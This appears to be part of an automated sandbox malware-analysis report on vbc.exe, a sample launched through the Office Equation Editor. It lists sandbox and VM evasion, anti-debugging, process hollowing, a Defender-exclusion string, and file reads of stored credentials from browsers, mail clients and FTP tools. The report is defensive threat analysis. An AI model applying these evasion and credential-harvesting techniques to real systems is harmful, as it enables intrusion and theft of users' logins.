Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 4.2.vbc.exe.24d5ea4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2534e8c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2240, type: MEMORYSTR
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2032 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2544 Thread sleep time: -36461s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2116 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 408 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 408 Thread sleep time: -120000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1928 Thread sleep count: 9494 > 30
Source: C:\Users\Public\vbc.exe TID: 408 Thread sleep count: 111 > 30
Source: C:\Users\Public\vbc.exe TID: 1928 Thread sleep count: 246 > 30
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9494
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 36461
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000
Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: !bqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe4
Source: vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: qnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe
Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: `!bqnrbzdfmzbzuurhfqqemumlniducnyded.exe
Source: vbc.exe, 00000005.00000002.668728779.0000000000270000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 4cqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed$'w
Source: vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qnrbzdfmzbzuurhfqqemumlniducnyded.exe
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: InternalNameqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe(
Source: vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668728779.0000000000270000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: qnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed
Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging

Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe

Language, Device and Operating System Detection

Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.471126039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.469116733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2240, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match File source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.471126039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.469116733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2240, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR